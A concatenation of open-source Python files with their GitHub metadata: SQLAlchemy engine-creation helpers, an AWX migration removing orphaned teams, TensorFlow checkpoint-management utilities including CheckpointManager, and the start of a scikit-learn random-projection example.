* the ``threadlocal`` strategy, which is described in
:ref:`threadlocal_strategy`;
* the ``mock`` strategy, which dispatches all statement
execution to a function passed as the argument ``executor``.
See `example in the FAQ
<http://www.sqlalchemy.org/trac/wiki/FAQ#HowcanIgettheCREATETABLEDROPTABLEoutputasastring>`_.
:param executor=None: a function taking arguments
``(sql, *multiparams, **params)``, to which the ``mock`` strategy will
dispatch all statement execution. Used only by ``strategy='mock'``.
"""
strategy = kwargs.pop('strategy', default_strategy)
strategy = strategies.strategies[strategy]
return strategy.create(*args, **kwargs)
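# Illustrative call combining a URL with engine-, pool- and DBAPI-level
# keyword arguments as described above; credentials and database names are
# placeholders:
#
#     engine = create_engine(
#         "postgresql://scott:tiger@localhost/test",
#         echo=True,                             # Engine-level logging
#         pool_size=10,                          # passed to QueuePool
#         connect_args={"connect_timeout": 5},   # passed to the DBAPI connect()
#     )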
def engine_from_config(configuration, prefix='sqlalchemy.', **kwargs):
"""Create a new Engine instance using a configuration dictionary.
The dictionary is typically produced from a config file where keys
are prefixed, such as sqlalchemy.url, sqlalchemy.echo, etc. The
'prefix' argument indicates the prefix to be searched for.
A select set of keyword arguments will be "coerced" to their
expected type based on string values. In a future release, this
functionality will be expanded and include dialect-specific
arguments.
"""
options = dict((key[len(prefix):], configuration[key])
for key in configuration
if key.startswith(prefix))
options['_coerce_config'] = True
options.update(kwargs)
url = options.pop('url')
return create_engine(url, **options)
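# Illustrative configuration dictionary for the helper above, e.g. as parsed
# from an ini file; the values are placeholders:
#
#     config = {
#         "sqlalchemy.url": "sqlite:///example.db",
#         "sqlalchemy.echo": "false",
#         "sqlalchemy.pool_recycle": "3600",
#     }
#     engine = engine_from_config(config, prefix="sqlalchemy.")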
__all__ = (
'create_engine',
'engine_from_config',
)
| {
"content_hash": "9b896b61a41721345281c45ff0e8df93",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 103,
"avg_line_length": 42.83879781420765,
"alnum_prop": 0.6869698322597104,
"repo_name": "jessekl/flixr",
"id": "99251f63039bd6328313f2ff943cd0a20d0c4503",
"size": "15916",
"binary": false,
"copies": "78",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/sqlalchemy/engine/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "44245"
},
{
"name": "CSS",
"bytes": "22772"
},
{
"name": "Groff",
"bytes": "73"
},
{
"name": "HTML",
"bytes": "25882"
},
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Mako",
"bytes": "7564"
},
{
"name": "Python",
"bytes": "14303733"
},
{
"name": "Shell",
"bytes": "3763"
},
{
"name": "XSLT",
"bytes": "152770"
}
],
"symlink_target": ""
} |
import logging
from django.utils.encoding import smart_text
logger = logging.getLogger('rbac_migrations')
def migrate_team(apps, schema_editor):
'''If an orphan team exists that is still active, delete it.'''
Team = apps.get_model('main', 'Team')
for team in Team.objects.iterator():
if team.organization is None:
logger.info(smart_text(u"Deleting orphaned team: {}".format(team.name)))
team.delete()
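# Illustrative wiring only: a data migration would typically invoke the
# function above via RunPython (assuming ``from django.db import migrations``);
# the dependency name below is a placeholder:
#
#     class Migration(migrations.Migration):
#         dependencies = [('main', '00XX_previous_migration')]
#         operations = [migrations.RunPython(migrate_team)]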
| {
"content_hash": "f1d549e11ecb63a4cd52f2ba21be5fb9",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 84,
"avg_line_length": 37.25,
"alnum_prop": 0.6756152125279642,
"repo_name": "snahelou/awx",
"id": "7c0db853096bbca1f3d22a8315e1150a465e3ebb",
"size": "456",
"binary": false,
"copies": "2",
"ref": "refs/heads/devel",
"path": "awx/main/migrations/_team_cleanup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "277672"
},
{
"name": "HTML",
"bytes": "424349"
},
{
"name": "JavaScript",
"bytes": "2903576"
},
{
"name": "Makefile",
"bytes": "20443"
},
{
"name": "Nginx",
"bytes": "2520"
},
{
"name": "PowerShell",
"bytes": "6936"
},
{
"name": "Python",
"bytes": "7328472"
},
{
"name": "Shell",
"bytes": "1068"
}
],
"symlink_target": ""
} |
"""Save and restore variables."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os.path
import re
import time
from google.protobuf import text_format
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import training_util
from tensorflow.python.training.checkpoint_state_pb2 import CheckpointState
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
def _GetCheckpointFilename(save_dir, latest_filename):
"""Returns a filename for storing the CheckpointState.
Args:
save_dir: The directory for saving and restoring checkpoints.
latest_filename: Name of the file in 'save_dir' that is used
to store the CheckpointState.
Returns:
The path of the file that contains the CheckpointState proto.
"""
if latest_filename is None:
latest_filename = "checkpoint"
return os.path.join(save_dir, latest_filename)
@tf_export(v1=["train.generate_checkpoint_state_proto"])
def generate_checkpoint_state_proto(save_dir,
model_checkpoint_path,
all_model_checkpoint_paths=None,
all_model_checkpoint_timestamps=None,
last_preserved_timestamp=None):
"""Generates a checkpoint state proto.
Args:
save_dir: Directory where the model was saved.
model_checkpoint_path: The checkpoint file.
all_model_checkpoint_paths: List of strings. Paths to all not-yet-deleted
checkpoints, sorted from oldest to newest. If this is a non-empty list,
the last element must be equal to model_checkpoint_path. These paths
are also saved in the CheckpointState proto.
all_model_checkpoint_timestamps: A list of floats, indicating the number of
seconds since the Epoch when each checkpoint was generated.
last_preserved_timestamp: A float, indicating the number of seconds since
the Epoch when the last preserved checkpoint was written, e.g. due to a
`keep_checkpoint_every_n_hours` parameter (see
`tf.contrib.checkpoint.CheckpointManager` for an implementation).
Returns:
CheckpointState proto with model_checkpoint_path and
all_model_checkpoint_paths updated to either absolute paths or
relative paths to the current save_dir.
Raises:
ValueError: If `all_model_checkpoint_timestamps` was provided but its length
does not match `all_model_checkpoint_paths`.
"""
if all_model_checkpoint_paths is None:
all_model_checkpoint_paths = []
if (not all_model_checkpoint_paths or
all_model_checkpoint_paths[-1] != model_checkpoint_path):
logging.info("%s is not in all_model_checkpoint_paths. Manually adding it.",
model_checkpoint_path)
all_model_checkpoint_paths.append(model_checkpoint_path)
if (all_model_checkpoint_timestamps
and (len(all_model_checkpoint_timestamps)
!= len(all_model_checkpoint_paths))):
raise ValueError(
("Checkpoint timestamps, if provided, must match checkpoint paths (got "
"paths %s and timestamps %s)")
% (all_model_checkpoint_paths, all_model_checkpoint_timestamps))
# Relative paths need to be rewritten to be relative to the "save_dir"
# if model_checkpoint_path already contains "save_dir".
if not os.path.isabs(save_dir):
if not os.path.isabs(model_checkpoint_path):
model_checkpoint_path = os.path.relpath(model_checkpoint_path, save_dir)
for i in range(len(all_model_checkpoint_paths)):
p = all_model_checkpoint_paths[i]
if not os.path.isabs(p):
all_model_checkpoint_paths[i] = os.path.relpath(p, save_dir)
coord_checkpoint_proto = CheckpointState(
model_checkpoint_path=model_checkpoint_path,
all_model_checkpoint_paths=all_model_checkpoint_paths,
all_model_checkpoint_timestamps=all_model_checkpoint_timestamps,
last_preserved_timestamp=last_preserved_timestamp)
return coord_checkpoint_proto
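# Illustrative call; the paths below are placeholders:
#
#   proto = generate_checkpoint_state_proto(
#       save_dir="/tmp/model",
#       model_checkpoint_path="/tmp/model/ckpt-200",
#       all_model_checkpoint_paths=["/tmp/model/ckpt-100"])
#   # "/tmp/model/ckpt-200" is appended as the newest entry since it was not
#   # already last; with an absolute save_dir the paths are left as given
#   # rather than rewritten relative to it.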
@deprecation.deprecated(
date=None,
instructions=("Use `tf.train.CheckpointManager` to manage checkpoints "
"rather than manually editing the Checkpoint proto."))
@tf_export(v1=["train.update_checkpoint_state"])
def update_checkpoint_state(save_dir,
model_checkpoint_path,
all_model_checkpoint_paths=None,
latest_filename=None,
all_model_checkpoint_timestamps=None,
last_preserved_timestamp=None):
"""Updates the content of the 'checkpoint' file.
This updates the checkpoint file containing a CheckpointState
proto.
Args:
save_dir: Directory where the model was saved.
model_checkpoint_path: The checkpoint file.
all_model_checkpoint_paths: List of strings. Paths to all not-yet-deleted
checkpoints, sorted from oldest to newest. If this is a non-empty list,
the last element must be equal to model_checkpoint_path. These paths
are also saved in the CheckpointState proto.
latest_filename: Optional name of the checkpoint file. Default to
'checkpoint'.
all_model_checkpoint_timestamps: Optional list of timestamps (floats,
seconds since the Epoch) indicating when the checkpoints in
`all_model_checkpoint_paths` were created.
last_preserved_timestamp: A float, indicating the number of seconds since
the Epoch when the last preserved checkpoint was written, e.g. due to a
`keep_checkpoint_every_n_hours` parameter (see
`tf.contrib.checkpoint.CheckpointManager` for an implementation).
Raises:
RuntimeError: If any of the model checkpoint paths conflict with the file
      containing CheckpointState.
"""
update_checkpoint_state_internal(
save_dir=save_dir,
model_checkpoint_path=model_checkpoint_path,
all_model_checkpoint_paths=all_model_checkpoint_paths,
latest_filename=latest_filename,
save_relative_paths=False,
all_model_checkpoint_timestamps=all_model_checkpoint_timestamps,
last_preserved_timestamp=last_preserved_timestamp)
def update_checkpoint_state_internal(save_dir,
model_checkpoint_path,
all_model_checkpoint_paths=None,
latest_filename=None,
save_relative_paths=False,
all_model_checkpoint_timestamps=None,
last_preserved_timestamp=None):
"""Updates the content of the 'checkpoint' file.
This updates the checkpoint file containing a CheckpointState
proto.
Args:
save_dir: Directory where the model was saved.
model_checkpoint_path: The checkpoint file.
all_model_checkpoint_paths: List of strings. Paths to all not-yet-deleted
checkpoints, sorted from oldest to newest. If this is a non-empty list,
the last element must be equal to model_checkpoint_path. These paths
are also saved in the CheckpointState proto.
latest_filename: Optional name of the checkpoint file. Default to
'checkpoint'.
save_relative_paths: If `True`, will write relative paths to the checkpoint
state file.
all_model_checkpoint_timestamps: Optional list of timestamps (floats,
seconds since the Epoch) indicating when the checkpoints in
`all_model_checkpoint_paths` were created.
last_preserved_timestamp: A float, indicating the number of seconds since
the Epoch when the last preserved checkpoint was written, e.g. due to a
`keep_checkpoint_every_n_hours` parameter (see
`tf.contrib.checkpoint.CheckpointManager` for an implementation).
Raises:
RuntimeError: If any of the model checkpoint paths conflict with the file
      containing CheckpointState.
"""
# Writes the "checkpoint" file for the coordinator for later restoration.
coord_checkpoint_filename = _GetCheckpointFilename(save_dir, latest_filename)
if save_relative_paths:
if os.path.isabs(model_checkpoint_path):
rel_model_checkpoint_path = os.path.relpath(
model_checkpoint_path, save_dir)
else:
rel_model_checkpoint_path = model_checkpoint_path
rel_all_model_checkpoint_paths = []
for p in all_model_checkpoint_paths:
if os.path.isabs(p):
rel_all_model_checkpoint_paths.append(os.path.relpath(p, save_dir))
else:
rel_all_model_checkpoint_paths.append(p)
ckpt = generate_checkpoint_state_proto(
save_dir,
rel_model_checkpoint_path,
all_model_checkpoint_paths=rel_all_model_checkpoint_paths,
all_model_checkpoint_timestamps=all_model_checkpoint_timestamps,
last_preserved_timestamp=last_preserved_timestamp)
else:
ckpt = generate_checkpoint_state_proto(
save_dir,
model_checkpoint_path,
all_model_checkpoint_paths=all_model_checkpoint_paths,
all_model_checkpoint_timestamps=all_model_checkpoint_timestamps,
last_preserved_timestamp=last_preserved_timestamp)
if coord_checkpoint_filename == ckpt.model_checkpoint_path:
raise RuntimeError("Save path '%s' conflicts with path used for "
"checkpoint state. Please use a different save path." %
model_checkpoint_path)
# Preventing potential read/write race condition by *atomically* writing to a
# file.
file_io.atomic_write_string_to_file(coord_checkpoint_filename,
text_format.MessageToString(ckpt))
@tf_export("train.get_checkpoint_state")
def get_checkpoint_state(checkpoint_dir, latest_filename=None):
"""Returns CheckpointState proto from the "checkpoint" file.
If the "checkpoint" file contains a valid CheckpointState
proto, returns it.
Args:
checkpoint_dir: The directory of checkpoints.
latest_filename: Optional name of the checkpoint file. Default to
'checkpoint'.
Returns:
A CheckpointState if the state was available, None
otherwise.
Raises:
ValueError: if the checkpoint read doesn't have model_checkpoint_path set.
"""
ckpt = None
coord_checkpoint_filename = _GetCheckpointFilename(checkpoint_dir,
latest_filename)
f = None
try:
# Check that the file exists before opening it to avoid
# many lines of errors from colossus in the logs.
if file_io.file_exists(coord_checkpoint_filename):
file_content = file_io.read_file_to_string(
coord_checkpoint_filename)
ckpt = CheckpointState()
text_format.Merge(file_content, ckpt)
if not ckpt.model_checkpoint_path:
raise ValueError("Invalid checkpoint state loaded from "
+ checkpoint_dir)
# For relative model_checkpoint_path and all_model_checkpoint_paths,
# prepend checkpoint_dir.
if not os.path.isabs(ckpt.model_checkpoint_path):
ckpt.model_checkpoint_path = os.path.join(checkpoint_dir,
ckpt.model_checkpoint_path)
for i in range(len(ckpt.all_model_checkpoint_paths)):
p = ckpt.all_model_checkpoint_paths[i]
if not os.path.isabs(p):
ckpt.all_model_checkpoint_paths[i] = os.path.join(checkpoint_dir, p)
except errors.OpError as e:
# It's ok if the file cannot be read
logging.warning("%s: %s", type(e).__name__, e)
logging.warning("%s: Checkpoint ignored", coord_checkpoint_filename)
return None
except text_format.ParseError as e:
logging.warning("%s: %s", type(e).__name__, e)
logging.warning("%s: Checkpoint ignored", coord_checkpoint_filename)
return None
finally:
if f:
f.close()
return ckpt
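# Illustrative usage; the directory is a placeholder:
#
#   ckpt = get_checkpoint_state("/tmp/model")
#   if ckpt:  # None when no readable "checkpoint" file exists
#     print(ckpt.model_checkpoint_path)              # most recent prefix
#     print(list(ckpt.all_model_checkpoint_paths))   # oldest to newest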
def _prefix_to_checkpoint_path(prefix, format_version):
"""Returns the pathname of a checkpoint file, given the checkpoint prefix.
For V1 checkpoint, simply returns the prefix itself (the data file). For V2,
returns the pathname to the index file.
Args:
prefix: a string, the prefix of a checkpoint.
format_version: the checkpoint format version that corresponds to the
prefix.
Returns:
The pathname of a checkpoint file, taking into account the checkpoint
format version.
"""
if format_version == saver_pb2.SaverDef.V2:
return prefix + ".index" # The index file identifies a checkpoint.
return prefix # Just the data file.
@tf_export("train.latest_checkpoint")
def latest_checkpoint(checkpoint_dir, latest_filename=None):
"""Finds the filename of latest saved checkpoint file.
Args:
checkpoint_dir: Directory where the variables were saved.
latest_filename: Optional name for the protocol buffer file that
contains the list of most recent checkpoint filenames.
See the corresponding argument to `Saver.save()`.
Returns:
The full path to the latest checkpoint or `None` if no checkpoint was found.
"""
# Pick the latest checkpoint based on checkpoint state.
ckpt = get_checkpoint_state(checkpoint_dir, latest_filename)
if ckpt and ckpt.model_checkpoint_path:
# Look for either a V2 path or a V1 path, with priority for V2.
v2_path = _prefix_to_checkpoint_path(ckpt.model_checkpoint_path,
saver_pb2.SaverDef.V2)
v1_path = _prefix_to_checkpoint_path(ckpt.model_checkpoint_path,
saver_pb2.SaverDef.V1)
if file_io.get_matching_files(v2_path) or file_io.get_matching_files(
v1_path):
return ckpt.model_checkpoint_path
else:
logging.error("Couldn't match files for checkpoint %s",
ckpt.model_checkpoint_path)
return None
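# Illustrative usage; the directory and the restore target are placeholders:
#
#   path = latest_checkpoint("/tmp/model")   # e.g. "/tmp/model/ckpt-200", or None
#   if path:
#     saver.restore(sess, path)              # `saver`/`sess` assumed to exist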
@deprecation.deprecated(
date=None,
instructions="Use standard file APIs to check for files with this prefix.")
@tf_export(v1=["train.checkpoint_exists"])
def checkpoint_exists(checkpoint_prefix):
"""Checks whether a V1 or V2 checkpoint exists with the specified prefix.
This is the recommended way to check if a checkpoint exists, since it takes
into account the naming difference between V1 and V2 formats.
Args:
checkpoint_prefix: the prefix of a V1 or V2 checkpoint, with V2 taking
priority. Typically the result of `Saver.save()` or that of
`tf.train.latest_checkpoint()`, regardless of sharded/non-sharded or
V1/V2.
Returns:
A bool, true iff a checkpoint referred to by `checkpoint_prefix` exists.
"""
pathname = _prefix_to_checkpoint_path(checkpoint_prefix,
saver_pb2.SaverDef.V2)
if file_io.get_matching_files(pathname):
return True
elif file_io.get_matching_files(checkpoint_prefix):
return True
else:
return False
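# Illustrative check; the prefix is a placeholder:
#
#   checkpoint_exists("/tmp/model/ckpt-200")
#   # True if "/tmp/model/ckpt-200.index" (V2) or the exact V1 data file exists.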
@deprecation.deprecated(
date=None,
instructions="Use standard file utilities to get mtimes.")
@tf_export(v1=["train.get_checkpoint_mtimes"])
def get_checkpoint_mtimes(checkpoint_prefixes):
"""Returns the mtimes (modification timestamps) of the checkpoints.
Globs for the checkpoints pointed to by `checkpoint_prefixes`. If the files
exist, collect their mtime. Both V2 and V1 checkpoints are considered, in
that priority.
This is the recommended way to get the mtimes, since it takes into account
the naming difference between V1 and V2 formats.
Args:
checkpoint_prefixes: a list of checkpoint paths, typically the results of
`Saver.save()` or those of `tf.train.latest_checkpoint()`, regardless of
sharded/non-sharded or V1/V2.
Returns:
    A list of mtimes (in seconds since the Epoch) of the found checkpoints.
"""
mtimes = []
def match_maybe_append(pathname):
fnames = file_io.get_matching_files(pathname)
if fnames:
mtimes.append(file_io.stat(fnames[0]).mtime_nsec / 1e9)
return True
return False
for checkpoint_prefix in checkpoint_prefixes:
# Tries V2's metadata file first.
pathname = _prefix_to_checkpoint_path(checkpoint_prefix,
saver_pb2.SaverDef.V2)
if match_maybe_append(pathname):
continue
# Otherwise, tries V1, where the prefix is the complete pathname.
match_maybe_append(checkpoint_prefix)
return mtimes
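# Illustrative call; the prefixes are placeholders:
#
#   get_checkpoint_mtimes(["/tmp/model/ckpt-100", "/tmp/model/ckpt-200"])
#   # -> one float (seconds since the Epoch) per prefix whose files were found,
#   #    with V2 index files checked before V1 data files.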
@deprecation.deprecated(
date=None,
instructions="Use standard file APIs to delete files with this prefix.")
@tf_export(v1=["train.remove_checkpoint"])
def remove_checkpoint(checkpoint_prefix,
checkpoint_format_version=saver_pb2.SaverDef.V2,
meta_graph_suffix="meta"):
"""Removes a checkpoint given by `checkpoint_prefix`.
Args:
checkpoint_prefix: The prefix of a V1 or V2 checkpoint. Typically the result
of `Saver.save()` or that of `tf.train.latest_checkpoint()`, regardless of
sharded/non-sharded or V1/V2.
checkpoint_format_version: `SaverDef.CheckpointFormatVersion`, defaults to
`SaverDef.V2`.
meta_graph_suffix: Suffix for `MetaGraphDef` file. Defaults to 'meta'.
"""
_delete_file_if_exists(
meta_graph_filename(checkpoint_prefix, meta_graph_suffix))
if checkpoint_format_version == saver_pb2.SaverDef.V2:
# V2 has a metadata file and some data files.
_delete_file_if_exists(checkpoint_prefix + ".index")
_delete_file_if_exists(checkpoint_prefix + ".data-?????-of-?????")
else:
# V1, Legacy. Exact match on the data file.
_delete_file_if_exists(checkpoint_prefix)
def _delete_file_if_exists(filespec):
"""Deletes files matching `filespec`."""
for pathname in file_io.get_matching_files(filespec):
file_io.delete_file(pathname)
def meta_graph_filename(checkpoint_filename, meta_graph_suffix="meta"):
"""Returns the meta graph filename.
Args:
checkpoint_filename: Name of the checkpoint file.
meta_graph_suffix: Suffix for `MetaGraphDef` file. Defaults to 'meta'.
Returns:
MetaGraph file name.
"""
# If the checkpoint_filename is sharded, the checkpoint_filename could
# be of format model.ckpt-step#-?????-of-shard#. For example,
# model.ckpt-123456-?????-of-00005, or model.ckpt-123456-00001-of-00002.
basename = re.sub(r"-[\d\?]+-of-\d+$", "", checkpoint_filename)
suffixed_filename = ".".join([basename, meta_graph_suffix])
return suffixed_filename
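# Illustrative results; the filenames are placeholders:
#
#   meta_graph_filename("model.ckpt-123456")
#   # -> "model.ckpt-123456.meta"
#   meta_graph_filename("model.ckpt-123456-?????-of-00005")
#   # -> "model.ckpt-123456.meta"   (shard suffix stripped first)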
# TODO(allenl): Allow tf.keras.Model instances in the constructor directly?
@tf_export("train.CheckpointManager")
class CheckpointManager(object):
"""Deletes old checkpoints.
Example usage:
```python
import tensorflow as tf
checkpoint = tf.train.Checkpoint(optimizer=optimizer, model=model)
manager = tf.contrib.checkpoint.CheckpointManager(
checkpoint, directory="/tmp/model", max_to_keep=5)
status = checkpoint.restore(manager.latest_checkpoint)
while True:
# train
manager.save()
```
`CheckpointManager` preserves its own state across instantiations (see the
`__init__` documentation for details). Only one should be active in a
particular directory at a time.
"""
def __init__(self, checkpoint, directory,
max_to_keep, keep_checkpoint_every_n_hours=None):
"""Configure a `CheckpointManager` for use in `directory`.
If a `CheckpointManager` was previously used in `directory`, its
state will be restored. This includes the list of managed checkpoints and
the timestamp bookkeeping necessary to support
`keep_checkpoint_every_n_hours`. The behavior of the new `CheckpointManager`
will be the same as the previous `CheckpointManager`, including cleaning up
existing checkpoints if appropriate.
Checkpoints are only considered for deletion just after a new checkpoint has
been added. At that point, `max_to_keep` checkpoints will remain in an
"active set". Once a checkpoint is preserved by
`keep_checkpoint_every_n_hours` it will not be deleted by this
`CheckpointManager` or any future `CheckpointManager` instantiated in
`directory` (regardless of the new setting of
`keep_checkpoint_every_n_hours`). The `max_to_keep` checkpoints in the
active set may be deleted by this `CheckpointManager` or a future
`CheckpointManager` instantiated in `directory` (subject to its
`max_to_keep` and `keep_checkpoint_every_n_hours` settings).
Args:
checkpoint: The `tf.train.Checkpoint` instance to save and manage
checkpoints for.
directory: The path to a directory in which to write checkpoints. A
special file named "checkpoint" is also written to this directory (in a
human-readable text format) which contains the state of the
`CheckpointManager`.
max_to_keep: An integer, the number of checkpoints to keep. Unless
preserved by `keep_checkpoint_every_n_hours`, checkpoints will be
deleted from the active set, oldest first, until only `max_to_keep`
checkpoints remain. If `None`, no checkpoints are deleted and everything
stays in the active set. Note that `max_to_keep=None` will keep all
checkpoint paths in memory and in the checkpoint state protocol buffer
on disk.
keep_checkpoint_every_n_hours: Upon removal from the active set, a
checkpoint will be preserved if it has been at least
`keep_checkpoint_every_n_hours` since the last preserved checkpoint. The
default setting of `None` does not preserve any checkpoints in this way.
Raises:
ValueError: If `max_to_keep` is not a positive integer.
"""
self._checkpoint = checkpoint
self._save_counter_assign = None
if max_to_keep is not None and max_to_keep <= 0:
raise ValueError(
("Expected a positive integer or `None` for `max_to_max_to_keep`, "
"got %d.")
% (max_to_keep,))
self._max_to_keep = max_to_keep
self._keep_checkpoint_every_n_hours = keep_checkpoint_every_n_hours
self._directory = directory
self._checkpoint_prefix = os.path.join(directory, "ckpt")
recovered_state = get_checkpoint_state(directory)
current_clock = time.time()
self._maybe_delete = collections.OrderedDict()
if recovered_state is None:
self._latest_checkpoint = None
      # Set the clock back slightly to avoid race conditions when quickly
# re-creating a CheckpointManager.
self._last_preserved_timestamp = current_clock - 1.
else:
self._latest_checkpoint = recovered_state.model_checkpoint_path
self._last_preserved_timestamp = recovered_state.last_preserved_timestamp
if current_clock < self._last_preserved_timestamp:
# Time seems to have reversed itself. In addition to this warning, we'll
# min() saved checkpoint timestamps with the current time to ensure that
# old checkpoints don't get deleted accidentally.
logging.warning(
("time.time() returned a value %f seconds behind the last "
"preserved checkpoint timestamp.")
% (self._last_preserved_timestamp - current_clock,))
self._last_preserved_timestamp = current_clock
all_timestamps = recovered_state.all_model_checkpoint_timestamps
all_paths = recovered_state.all_model_checkpoint_paths
del recovered_state # Uses modified values from now on
if not all_timestamps:
all_timestamps = [self._last_preserved_timestamp] * len(all_paths)
for filename, timestamp in zip(all_paths, all_timestamps):
timestamp = min(timestamp, current_clock)
if timestamp > self._last_preserved_timestamp:
self._maybe_delete[filename] = timestamp
@property
def latest_checkpoint(self):
"""The prefix of the most recent checkpoint in `directory`.
Equivalent to `tf.train.latest_checkpoint(directory)` where `directory` is
the constructor argument to `CheckpointManager`.
Suitable for passing to `tf.train.Checkpoint.restore` to resume training.
Returns:
The checkpoint prefix. If there are no checkpoints, returns `None`.
"""
return self._latest_checkpoint
@property
def checkpoints(self):
"""A list of managed checkpoints.
Note that checkpoints saved due to `keep_checkpoint_every_n_hours` will not
show up in this list (to avoid ever-growing filename lists).
Returns:
A list of filenames, sorted from oldest to newest.
"""
return list(self._maybe_delete.keys())
def _sweep(self):
"""Deletes or preserves managed checkpoints."""
if not self._max_to_keep:
# Does not update self._last_preserved_timestamp, since everything is kept
# in the active set.
return
while len(self._maybe_delete) > self._max_to_keep:
filename, timestamp = self._maybe_delete.popitem(last=False)
# Even if we're keeping this checkpoint due to
# keep_checkpoint_every_n_hours, we won't reference it to avoid
# infinitely-growing CheckpointState protos.
if (self._keep_checkpoint_every_n_hours
and (timestamp - self._keep_checkpoint_every_n_hours * 3600.
>= self._last_preserved_timestamp)):
self._last_preserved_timestamp = timestamp
continue
_delete_file_if_exists(filename + ".index")
_delete_file_if_exists(filename + ".data-?????-of-?????")
def _record_state(self):
"""Saves the `CheckpointManager`'s state in `directory`."""
filenames, timestamps = zip(*self._maybe_delete.items())
update_checkpoint_state_internal(
self._directory,
model_checkpoint_path=self.latest_checkpoint,
all_model_checkpoint_paths=filenames,
all_model_checkpoint_timestamps=timestamps,
last_preserved_timestamp=self._last_preserved_timestamp,
save_relative_paths=True)
@property
def _prefix(self):
"""A common prefix for all checkpoints saved with this manager.
For example, if `directory` (a constructor argument) were `"/tmp/tf-model"`,
`prefix` would be `"/tmp/tf-model/ckpt"` and checkpoints would generally be
numbered `"/tmp/tf-model/ckpt-1"`, `"/tmp/tf-model/ckpt-2"`, and so on. Each
checkpoint has several associated files
(e.g. `"/tmp/tf-model/ckpt-2.index"`).
Returns:
A string prefix.
"""
return self._checkpoint_prefix
def save(self, checkpoint_number=None):
"""Creates a new checkpoint and manages it.
Args:
checkpoint_number: An optional integer, or an integer-dtype `Variable` or
`Tensor`, used to number the checkpoint. If `None` (default),
checkpoints are numbered using `checkpoint.save_counter`. Even if
`checkpoint_number` is provided, `save_counter` is still incremented. A
user-provided `checkpoint_number` is not incremented even if it is a
`Variable`.
Returns:
The path to the new checkpoint. It is also recorded in the `checkpoints`
      and `latest_checkpoint` properties.
"""
# Save counter logic duplicated from tf.train.Checkpoint, soon to diverge
# slightly with a custom numbering option.
if context.executing_eagerly():
save_counter = self._checkpoint.save_counter
save_counter.assign_add(1)
session = None
else:
session = ops.get_default_session()
def _initializing_creator(next_creator, **kwargs):
"""Initialize the save counter if it has been newly created."""
v = next_creator(**kwargs)
session.run(v.initializer)
return v
with variable_scope.variable_creator_scope(_initializing_creator):
save_counter = self._checkpoint.save_counter
if self._save_counter_assign is None:
self._save_counter_assign = save_counter.assign_add(1, read_value=False)
session.run(self._save_counter_assign)
if checkpoint_number is None:
checkpoint_number = save_counter
if not isinstance(checkpoint_number, compat.integral_types):
checkpoint_number = training_util.global_step(
sess=session, global_step_tensor=checkpoint_number)
prefix = "%s-%d" % (self._prefix, checkpoint_number)
save_path = self._checkpoint.write(prefix)
timestamp = time.time()
# If this is an overwritten checkpoint we were previously tracking, delete
# and reinsert it to make sure it goes to the end of the queue.
if save_path in self._maybe_delete:
del self._maybe_delete[save_path]
self._maybe_delete[save_path] = timestamp
self._latest_checkpoint = save_path
self._sweep()
self._record_state()
return save_path
| {
"content_hash": "a1d75fda56d04c98d926616c36739650",
"timestamp": "",
"source": "github",
"line_count": 688,
"max_line_length": 80,
"avg_line_length": 41.93313953488372,
"alnum_prop": 0.6894974003466204,
"repo_name": "kevin-coder/tensorflow-fork",
"id": "131ecf71ba56c4c683bf1748c4681dc28507d829",
"size": "29571",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/checkpoint_management.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "9117"
},
{
"name": "C",
"bytes": "340300"
},
{
"name": "C++",
"bytes": "39383425"
},
{
"name": "CMake",
"bytes": "194940"
},
{
"name": "Go",
"bytes": "1046987"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "567239"
},
{
"name": "Jupyter Notebook",
"bytes": "1940883"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "48231"
},
{
"name": "Objective-C",
"bytes": "12456"
},
{
"name": "Objective-C++",
"bytes": "94385"
},
{
"name": "PHP",
"bytes": "2140"
},
{
"name": "Perl",
"bytes": "6179"
},
{
"name": "Perl 6",
"bytes": "1357"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "33617202"
},
{
"name": "Ruby",
"bytes": "533"
},
{
"name": "Shell",
"bytes": "425910"
}
],
"symlink_target": ""
} |
r"""
=====================================================================
The Johnson-Lindenstrauss bound for embedding with random projections
=====================================================================
The `Johnson-Lindenstrauss lemma`_ states that any high dimensional
dataset can be randomly projected into a lower dimensional Euclidean
space while controlling the distortion in the pairwise distances.
.. _`Johnson-Lindenstrauss lemma`: https://en.wikipedia.org/wiki/\
Johnson%E2%80%93Lindenstrauss_lemma
"""
import sys
from time import time
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from sklearn.random_projection import johnson_lindenstrauss_min_dim
from sklearn.random_projection import SparseRandomProjection
from sklearn.datasets import fetch_20newsgroups_vectorized
from sklearn.datasets import load_digits
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.utils.fixes import parse_version
# `normed` is being deprecated in favor of `density` in histograms
if parse_version(matplotlib.__version__) >= parse_version("2.1"):
density_param = {"density": True}
else:
density_param = {"normed": True}
# %%
# Theoretical bounds
# ==================
# The distortion introduced by a random projection `p` is asserted by
# the fact that `p` defines an eps-embedding with good probability
# as defined by:
#
# .. math::
# (1 - eps) \|u - v\|^2 < \|p(u) - p(v)\|^2 < (1 + eps) \|u - v\|^2
#
# Where u and v are any rows taken from a dataset of shape (n_samples,
# n_features) and p is a projection by a random Gaussian N(0, 1) matrix
# of shape (n_components, n_features) (or a sparse Achlioptas matrix).
#
# The minimum number of components to guarantee the eps-embedding is
# given by:
#
# .. math::
# n\_components \geq 4 log(n\_samples) / (eps^2 / 2 - eps^3 / 3)
#
#
